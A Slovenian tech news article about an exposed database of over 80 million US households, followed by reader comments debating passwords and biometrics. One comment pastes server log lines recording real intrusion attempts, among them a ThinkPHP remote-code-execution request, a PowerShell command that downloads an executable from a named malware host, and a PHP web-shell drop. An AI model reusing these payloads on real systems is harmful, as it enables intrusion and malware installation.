» »

Pobegla baza z osebnimi in finančnimi podatki več kot polovice ameriških gospodinjstev

Pobegla baza z osebnimi in finančnimi podatki več kot polovice ameriških gospodinjstev

CNet - Na internetu se je znašla odprta in dostopna baza podatkov, ki vsebuje osebne informacije več kot 80 milijonov ameriških gospodinjstev (vseh v državi imajo 128 milijonov). To na žalost ni nič novega, je pa to pot nenavadno zlasti to, da še ni jasno, kdo je njen lastnik. Raziskovalca Ran Locar in Noam Rotem sta jo našla na Microsoftovih strežnikih, meri pa 24 GB.

V bazi so zapisani imena, polni naslovi, lokacijske informacije (koordinate), spol, starost, prihodki, tip bivališča in stan. Vsi v bazi so stari več kot 40 let, polji member_code in score pa kažeta, da gre verjetno za naročnike kakšne storitve. Podatki naj bi bili na internetu dostopni od februarja. Microsoft uradno ne komentira incidenta, verjetno pa so že stopili v stik z lastnikom baze, ki uporablja Microsoftovo gostovanje.

To je prva baza tolikšne velikosti (več kot polovica ameriških gospodinjstev!), ki vsebuje tako osebne podatke kakor finančne. Najverjetneje pripada kakšni zavarovalnici, kar bomo bržkone kmalu izvedeli.

26 komentarjev

HotBurek ::

Me zanima vrednost takšne baze. To si lahko greš ful dober target marketing. Sicer po klasični pošti, a če bi zraven imel še kak email naslov, tudi ne bi škodil.

They use port scanning to examine known IP blocks. This reveals open holes in web systems, which they then examine for weaknesses and data leaks.

Je tako hekanje dovoljeno izvajat v imenu "varnosti", kjer je source IP v EU/Sloveniji?

Ker gledam log fajle na strežniku, in skos neki requesti gor letijo, kjer je celo UA od tool-ov (python-requests, go-http-client, zgrab, curl, "-", itn.)

A ima kakter ISP postavljen honey pot, in potem aktivno blokira promet na celotnem omrežju?


Nekaj primerov requestov, ki mejijo na poskus vdora:

(V vednost, http://fid.hognoob.se/download.exe je virus.)

108.178.16.154 - - [23/Feb/2019:16:53:51 +0100] "(\x00{\x00\xB0\x00\xB0\x00\xA5\x00\xEA\x00Y\x00|\x005\x00(\x00V\x00\xE9\x00z\x00!\x00\xEB\x00W\x00z\x00\xB0\x00!\x00W\x00\xEA\x00Y\x00Y\x00\xE9\x00|\x00W\x005\x00Y\x00\xA5\x00|\x00\xCC\x00(\x00W\x00\xCC\x00\x06\x00\xEB\x00\xEA\x00\xA5\x00\xB0\x00\xCC\x00V\x00\xEB\x005\x00\xEB\x00Y\x00!\x00V\x00\x06\x00z\x00\xCC\x00z\x00\xE9\x00\x06\x005\x00\xEB\x005\x00|\x00!\x00{\x005\x00(\x00\xB0\x00!\x005\x00\xEA\x00\xEA\x00|\x00\xE9\x00(\x00\x06\x00!\x00z\x00\xCC\x00W\x00\x06\x00z\x00W\x00\xE9\x00!\x00\xEA\x00(\x00\xA5\x00\xEA\x00z\x00\xB0\x00\x06\x00!\x00\x06\x00\x06\x00{\x00z\x00z\x00|\x00(\x00\xEB\x00\xCC\x00\xCC\x00Y\x00W\x00\xB0\x00\xE9\x00|\x00(\x00\xCC\x00\xEB\x00!\x00\xCC\x00z\x00\xEB\x00\xEA\x00\x06\x00(\x00\xEB\x00|\x00|\x00\xEB\x00\xEA\x005\x00\xEA\x00|\x00W\x00(\x00\xCC\x00|\x00\xB0\x00V\x00\xE9\x00!\x005\x00\xB0\x00W\x00W\x00Y\x00\xCC\x005\x00{\x00\xEA\x00V\x00{\x00{\x00\xA5\x00z\x00\xE9\x00(\x00\xEB\x00{\x00!\x00\xEB\x00\xEB\x00\x06\x00z\x00{\x00V\x00Y\x00z\x00\xEA\x00\xA5\x00W\x00z\x00Y\x00\x06\x00V\x005\x00V\x00\xE9\x00Y\x00|\x00V\x00z\x00(\x00(\x005\x00z\x005\x00|\x00{\x00\xCC\x00\xA5\x00\xEA\x00W\x00Y\x00\xEB\x00(\x00(\x00Y\x00V\x00Y\x00\xB0\x00\x06\x00Y\x00V\x00{\x00(\x00V\x00Y\x005\x00z\x00W\x00\x06\x00\xB0\x00z\x00V\x00(\x00!\x00\xB0\x00\xA5\x00|\x00z\x005\x00!\x00!\x00|\x00W\x00\xA5\x00\xA5\x00\xCC\x00\x06\x00\xCC\x00{\x00\xEB\x00{\x00z\x00\xE9\x00W\x00\xCC\x005\x00Y\x00z\x00\xE9\x00\xEA\x005\x00\xCC\x00\xEA\x00\xE9\x00\xB0\x005\x00\xB0\x00\xEA\x00|\x00\xA5\x00\x06\x00\xA5\x005\x00\xEA\x00\xE9\x00\xA5\x00\xEB\x00V\x00\x06\x00!\x00\xEB\x00\xA5\x00\xEB\x00(\x00!\x00V\x00|\x00\xB0\x00\xEA\x00(\x00|\x00|\x00\xE9\x00\xB0\x00!\x00\xCC\x00W\x00\xEA\x00\xEA\x00\xEB\x00V\x00|\x00W\x00Y\x00\xA5\x00{\x00!\x00\xE9\x005\x00z\x00!\x00Y\x00|\x00\xCC\x00\xA5\x00\xA5\x00\xCC\x00\xEB\x00\xEB\x00Y\x00\xE9\x00\xE9\x00(\x00|\x00\xB0\x00(\x00W\x00V\x00z\x00|\x00\xB0\x00!\x005\x00\xCC\x00{\x00V\x00V\x00\xB0\x00\xE9\x00!\x00V\x00\xEA\x00W\x00\xA5\x00W\x00\xEA\x00z\x00\xA5\x00\xA5\x00\xA5\x00\xB0\x00\xE9\x00\x06\x00\xEA\x00\xB0\x00!\x00z\x00\xEB\x00W\x00Y\x00z\x00\xE9\x00\xCA\x00" 400 150 "-" "-"


13.232.215.11 - - [24/Feb/2019:03:58:18 +0100] "GET /TP/public/index.php?s=index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 273 "http://127.0.0.1/TP/public/index.php?s=... "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"


66.240.205.34 - - [28/Feb/2019:07:03:48 +0100] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 150 "-" "-"


91.185.47.238 - - [09/Mar/2019:21:39:15 +0100] "GET /public/index.php?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:... HTTP/1.1" 400 650 "http://127.0.0.1:443/public/index.php?s... /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:... C:/Windows/temp/urwhtsbareomjhe3387.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"


91.185.47.238 - - [09/Mar/2019:21:39:15 +0100] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^{?php%20$action%20=%20$_GET['xcmd'];system($action);?^}}hydra.php HTTP/1.1" 400 650 "http://127.0.0.1:443/public/index.php?s... ^{?php $action = $_GET['xcmd'];system($action);?^}}hydra.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"


91.185.47.238 - - [09/Mar/2019:21:39:15 +0100] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:... HTTP/1.1" 400 650 "http://127.0.0.1:443/public/hydra.php?x... /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:... C:/Windows/temp/urwhtsbareomjhe3387.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"


110.105.74.192 - - [24/Mar/2019:03:44:30 +0100] "GET /otsmobile/app/mgs/mgw.htm?operationType=com.cars.otsmobile.queryLeftTicket&requestData=%5B%7B%22train_date%22%3A%2220190329%22%2C%22purpose_codes%22%3A%2200%22%2C%22from_station%22%3A%22SHH%22%2C%22to_station%22%3A%22CNW%22%2C%22station_train_code%22%3A%22%22%2C%22start_time_begin%22%3A%220000%22%2C%22start_time_end%22%3A%222400%22%2C%22train_headers%22%3A%22QB%23%22%2C%22train_flag%22%3A%22%22%2C%22seat_type%22%3A%22%22%2C%22seatBack_Type%22%3A%22%22%2C%22ticket_num%22%3A%22%22%2C%22dfpStr%22%3A%22%22%2C%22baseDTO%22%3A%7B%22check_code%22%3A%22b2e99a3811a4d949d414f939662cbca6%22%2C%22device_no%22%3A%222362b1260ae54567255255b17d510c3e%22%2C%22mobile_no%22%3A%22%22%2C%22os_type%22%3A%22a%22%2C%22time_str%22%3A%2220190324104429%22%2C%22user_name%22%3A%22%22%2C%22version_no%22%3A%224.1.9%22%7D%7D%5D&ts=1553395469438&sign= HTTP/1.1" 200 130 "-" "Go-http-client/1.1"
root@debian:/# iptraf-ng
fatal: This program requires a screen size of at least 80 columns by 24 lines
Please resize your window

BUMM ::

Tokrat bi tole komot bolj bombastično napisali, ker gre za izjemno veliko bazo, kii se jo da zelo lepo izkoristiti.
Bo zanimivo spremljati.

Zgodovina sprememb…

  • spremenilo: BUMM ()

b3D_950 ::

@hotburek: omeji dostop na slo IP naslove, če ni nujno, da je server dosegljiv iz kjerkoli.
Zdaj, ko je mir jemo samo krompir.
豪快すぎ

filip007 ::

To je že očitno stalna praksa.
Vivaldi in Ubuntu.

DexterBoy ::

Khm... žalostno, da ima novica o pobegli bazi tako malo odziva, neka tema z linkom na 24 kur pa že dve strani :(
Nočem nikogar žaliti, ampak ali smo res prišli tako daleč, da osebni podatki niso vredni nič, oz. posamezniku nič ne pomenijo?
V zadnjem mesecu sem nekaj prijateljem (ne nekim znancem, prijtelji, ki jih poznam polovico življenja in več), nadgradil računalnike.
Dal sem jim winse, ker so "kao prestari", da bi probali Linux. OK, požrem to, ampak, da NISO HOTELI imeti gesla za vstop...
Asocialnost nima povezave, ampak me prime, da bi raje pasel krave v Kazahstanu, kot pa moral razlagati ljudem z višjo in visoko izobrazbo, zakaj NE SMEŠ imeti admin pravic na uporabniku in še tega furati brez gesla...
Ko ne gre več, ko se ustavi, RESET Vas spet v ritem spravi.
http://www.avtofil.si/

Markoff ::

Poznam programerje, ki za inf. varnost pravijo, da je nabodigatreba, tako da tile tvoji visokoizobraženi laiki niso neka izjema.
Sicer pa, glej, it's a dogeatdog world out there. Uzdaj se use i svoje kljuse. Vsak enkrat naleti na mino svoje ignorance. Ti pazi na svoje mine, drugi pa naj stopajo po svojih...
Novorek idiokracije:
posebaj, skropucalo, inžinir, intiligenca/intelegenca, apsolutno, anEks.

Zgodovina sprememb…

  • spremenilo: Markoff ()

jype ::

b3D_950 je izjavil:

@hotburek: omeji dostop na slo IP naslove, če ni nujno, da je server dosegljiv iz kjerkoli.
A ni potem bolj enostavno kar postavit BBS?

b3D_950 ::

Feltno/platišče BBS?
Zdaj, ko je mir jemo samo krompir.
豪快すぎ

kixs ::

Ja. Za ta mlade so to feltne :lol:

GizmoX ::

b3D_950 je izjavil:

Feltno/platišče BBS?
BBS
udirač => uni. dipl. inž. rač.

nekikr ::

OK, požrem to, ampak, da NISO HOTELI imeti gesla za vstop...
Asocialnost nima povezave, ampak me prime, da bi raje pasel krave v Kazahstanu, kot pa moral razlagati ljudem z višjo in visoko izobrazbo, zakaj NE SMEŠ imeti admin pravic na uporabniku in še tega furati brez gesla...

In zakaj točno star ata, ki igra pasjansjo na računalniku NE SME imeti admin pravic brez gesla na svojem računalniku? Kaj hudega se bo pa zgodilo? Mu bo kdo izbrisal rezultate zadnjih 10 iger? :) Eni ste paranoiki (tudi trezorja nima vsak doma, ker ga pač resnično ne rabi).

MrStein ::

DexterBoy je izjavil:


Dal sem jim winse, ker so "kao prestari", da bi probali Linux. OK, požrem to, ampak, da NISO HOTELI imeti gesla za vstop...

Moja naprava nima gesla. Pa ne moreš not. Niti, če mi kukaš čez rame, ko vtipkujem .. aja, ni gesla.

Gesla so pač bulšit. Kot konjske vprege. Ampak (bivši) kočijaži jih še kar hvalijo...
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

jukoz ::

MrStein je izjavil:


Moja naprava nima gesla. Pa ne moreš not. Niti, če mi kukaš čez rame, ko vtipkujem .. aja, ni gesla.


Če skopiram tvoj prstni odtis/roženico/kakršenkoli biometričen identifikator je pa kaj? Kaj pa če dobim digitaliziran zapis tvojega prstnega odtisa (oz drugega biometričnega identifikatorja)?
Imam dostop do vseh tvojih naprav za vse večne čase. Geslo lahko zamenjaš, prste bolj težko.

MrStein je izjavil:


Gesla so pač bulšit. Kot konjske vprege. Ampak (bivši) kočijaži jih še kar hvalijo...


Gesla za login so vseeno boljše kot nič. Če imam dom zaklnenjen z najbolj čip-šit ključavnico je vseeno bolje kot da ga nimam. Random vlomilec bo moral vseeno vlomiti vanj. Random obviskovalec pa odklenjen doma samo obišče.

nekikr je izjavil:

OK, požrem to, ampak, da NISO HOTELI imeti gesla za vstop...
Asocialnost nima povezave, ampak me prime, da bi raje pasel krave v Kazahstanu, kot pa moral razlagati ljudem z višjo in visoko izobrazbo, zakaj NE SMEŠ imeti admin pravic na uporabniku in še tega furati brez gesla...

In zakaj točno star ata, ki igra pasjansjo na računalniku NE SME imeti admin pravic brez gesla na svojem računalniku? Kaj hudega se bo pa zgodilo? Mu bo kdo izbrisal rezultate zadnjih 10 iger? :) Eni ste paranoiki (tudi trezorja nima vsak doma, ker ga pač resnično ne rabi).


Ne, ampak ker ima shranjena uporabniška imena in gesla (ter verjetno še certifikat) za dostop do e-pošte/facebook/banke/e-Uprave/karkoližepač, mu bo prvi obiskovalec pokradel denar/kaj kupil namesto njega/napisal grozilno pismo Trumpu, ...

Pol pa ne bo več tako zabavno. Začuda avte in hiše kar neki zaklepamo... Ne vem zakaj. Pa je smotano da ne moreš vrat samo odpret in da moraš prej iskat ključe...

Kle je razlaga koliko je vreden hacked PC:
https://krebsonsecurity.com/2012/10/the...

A misliš da z admin pravicami ne moreš fasati brezvezne okužbe in imeti veselja s tem?

Zgodovina sprememb…

  • spremenilo: jukoz ()

Shegevara ::

Če skopiram tvoj prstni odtis/roženico/kakršenkoli biometričen identifikator je pa kaj? Kaj pa če dobim digitaliziran zapis tvojega prstnega odtisa (oz drugega biometričnega identifikatorja)?
Imam dostop do vseh tvojih naprav za vse večne čase. Geslo lahko zamenjaš, prste bolj težko.


V obeh primerih lahko tist, ki mu suneš geslo ali prstne odtise nadaljuje varovanje z uporabo gesla.

Mislm da gesla niso kaj bistveno bolj varna kot prstni odtis, razen če govorimo o 2FA.

MrStein ::

jukoz je izjavil:

MrStein je izjavil:


Moja naprava nima gesla. Pa ne moreš not. Niti, če mi kukaš čez rame, ko vtipkujem .. aja, ni gesla.


Če skopiram tvoj prstni odtis/roženico/kakršenkoli biometričen identifikator je pa kaj? Kaj pa če dobim digitaliziran zapis tvojega prstnega odtisa (oz drugega biometričnega identifikatorja)?
Imam dostop do vseh tvojih naprav za vse večne čase. Geslo lahko zamenjaš, prste bolj težko.

Ja, konec sveta. Varnostna apokalip... aja, ne. Odklep na prst čisto lepo deluje, že tam 10 let. Hvala za skrb.

MrStein je izjavil:


Gesla so pač bulšit. Kot konjske vprege. Ampak (bivši) kočijaži jih še kar hvalijo...


Gesla za login so vseeno boljše kot nič. Če imam dom zaklnenjen z najbolj čip-šit ključavnico je vseeno bolje kot da ga nimam. Random vlomilec bo moral vseeno vlomiti vanj. Random obviskovalec pa odklenjen doma samo obišče.


Ja, tin foil hat je tudi bolje kot nič.
Če napadalec ni ravno "tipični forumaš", bo vdrl v PC z ali brez gesla.
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

AndrejO ::

nekikr je izjavil:

OK, požrem to, ampak, da NISO HOTELI imeti gesla za vstop...
Asocialnost nima povezave, ampak me prime, da bi raje pasel krave v Kazahstanu, kot pa moral razlagati ljudem z višjo in visoko izobrazbo, zakaj NE SMEŠ imeti admin pravic na uporabniku in še tega furati brez gesla...

In zakaj točno star ata, ki igra pasjansjo na računalniku NE SME imeti admin pravic brez gesla na svojem računalniku? Kaj hudega se bo pa zgodilo? Mu bo kdo izbrisal rezultate zadnjih 10 iger? :) Eni ste paranoiki (tudi trezorja nima vsak doma, ker ga pač resnično ne rabi).

 Zato.

Zato.In naj se tudi ve kje sem jaz dobil to nalepko v spomin in opomin.

BlaY0 ::

Ni te na slike njene poroke?

b3D_950 ::

Zdaj, ko je mir jemo samo krompir.
豪快すぎ

Vuli ::

večinoma so roboti, crawlerji...
|Gigabyte x570 Aorus Pro | R7 3700x | 16GB DDR4 RAM G.Skill V 3000 @ 3200 CL14|
|Gigabyte Z170X Gaming 7 | Core i5 6500 |

nekikr ::

Ne, ampak ker ima shranjena uporabniška imena in gesla (ter verjetno še certifikat) za dostop do e-pošte/facebook/banke/e-Uprave/karkoližepač, mu bo prvi obiskovalec pokradel denar/kaj kupil namesto njega/napisal grozilno pismo Trumpu, ...

Takih poznam vsaj 100. Nikomur še niso nikoli nič ukradli. Kar ne pomeni, da se to ne dogaja, pomeni pa, da se dogaja tako redko, da se ne splača kupovati alu folije vsak teden.

jukoz ::

Haha, sicer jih ne poznam 100, jih pa poznam kar dosti. Varovanje podatkov je težko, nadležno...
Dokler ti jih ne ukradejo, potem je pa cel halo.

Tako kot tisti s crknjenim diskom v drugi temi. Ni se delalo backupov in je disk po 12 (!!!!!!) letih crknu. Kdo bi si mislil.

Ko bo eden od tvoji 100 priletel na ta forum da so ga zaklenili iz FB/širi spam/je nakazal keš v nigerijo... se mu bomo pa spet smejali.

Sicer pa spet - nekako zaklenemo svoj avto/dom/kolo. Dejmo še svoje digitalno življenje.
Prilika dela tatu, če ti ukradejo nezaklenjeno kolo, bodo tudi tvoje podatke na pravkar ukradenem prenosniku.
Ja, ja, to kradejo samo đankiji za keš in jih briga. Ampak tisti ki od njih kupi pa že ve kaj mora naredit in za koliko lahko proda.

jukoz ::

MrStein je izjavil:


Ja, konec sveta. Varnostna apokalip... aja, ne. Odklep na prst čisto lepo deluje, že tam 10 let. Hvala za skrb.


Ne razumeš ane - ko je ukraden tvoj digitaliziran prstni odtis (roženica, karkoližepač), ima še nekdo dostop do tvojih zdajšnjih in prihodnjih podatkov.
In Google bo te podatke enkrat izgubil.

MrStein je izjavil:


Ja, tin foil hat je tudi bolje kot nič.
Če napadalec ni ravno "tipični forumaš", bo vdrl v PC z ali brez gesla.


Tat Zmikavt pride do dveh koles - zaklenjenega in nezaklenjenega. Katerega bo vzel?

Res mi ni jasno zakaj tak odpor proti uporabi neke najbolj osnovne zaščite.

MrStein ::

Ni odpor ampak razlaga dejstev.

jukoz je izjavil:

MrStein je izjavil:


Ja, konec sveta. Varnostna apokalip... aja, ne. Odklep na prst čisto lepo deluje, že tam 10 let. Hvala za skrb.


Ne razumeš ane - ko je ukraden tvoj digitaliziran prstni odtis (roženica, karkoližepač), ima še nekdo dostop do tvojih zdajšnjih in prihodnjih podatkov.
In Google bo te podatke enkrat izgubil.

Ne nima. Moral bo priti do tipkovnice (ali kje je pač senzor za prste). Že zato je bolj varno od gesla.
In ko bo tam, je itak vseeno, ker lahko PC vzame s sabo.

PS: Kak za vraga bi Google lahko izgubil te podatke?
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!

Zgodovina sprememb…

  • spremenil: MrStein ()

jukoz ::

MrStein je izjavil:

Ni odpor ampak razlaga dejstev.In ponovno, ko ti ukradejo bicikelj, ker si bil prelen in ga nisi zaklenil, ne jokat. In ko bodo tem revežem ukradli FB account naj ne jokajo.

MrStein je izjavil:


Ne nima. Moral bo priti do tipkovnice (ali kje je pač senzor za prste). Že zato je bolj varno od gesla.
In ko bo tam, je itak vseeno, ker lahko PC vzame s sabo.


Ti misliš da tipkovnica hrani digitaliziran prstni odtis? Da je omejen samo na tvoj OS? Verjetno že z XPji ni bil, in ga je Upek malo pošeral na Tajvan/Kitajsko. Kaj še le sedaj z Win10.

MrStein je izjavil:


PS: Kak za vraga bi Google lahko izgubil te podatke?


Imaš Androidni telefon? No, tako.

_0\WA6m7Uzc ::

Jukoz: tocno tako. Biometricni podatki niso zamenjava za geslo, bolje bi jih bilo primerjati z usernamom, zal pa so pohlepni proizvajalci mnozice prepricali, da je to "to". Pa tudi varnost, sploh prstenega odtisa je vprasljiva, puscas ga namrec vsepovsod.

Zgodovina sprememb…

MrStein ::

jukoz je izjavil:


Ti misliš da tipkovnica hrani digitaliziran prstni odtis?

Uh, kaj kadiš? Lahko tudi jaz?
Motiti se je človeško.
Motiti se pogosto je neumno.
Vztrajati pri zmoti je... oh, pozdravljen!


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

"Pametne" igrače v neumnih oblakih

Oddelek: Novice / Zasebnost
183858 (2668) myriad
»

Na internetu dostopna baza skoraj vseh ameriških volivcev

Oddelek: Novice / Zasebnost
63177 (1799) googleg1
»

V ZDA se pripravlja največji biometrični sistem za sledenje (strani: 1 2 3 )

Oddelek: Novice / Zasebnost
10621011 (16184) Twix
»

iTunes popularnejši od P2P (strani: 1 2 3 )

Oddelek: Novice / Ostale najave
1089887 (7784) christooss
»

DURS je na široko odpru vrata hekerjem

Oddelek: Omrežja in internet
71340 (1007) BigWhale

Več podobnih tem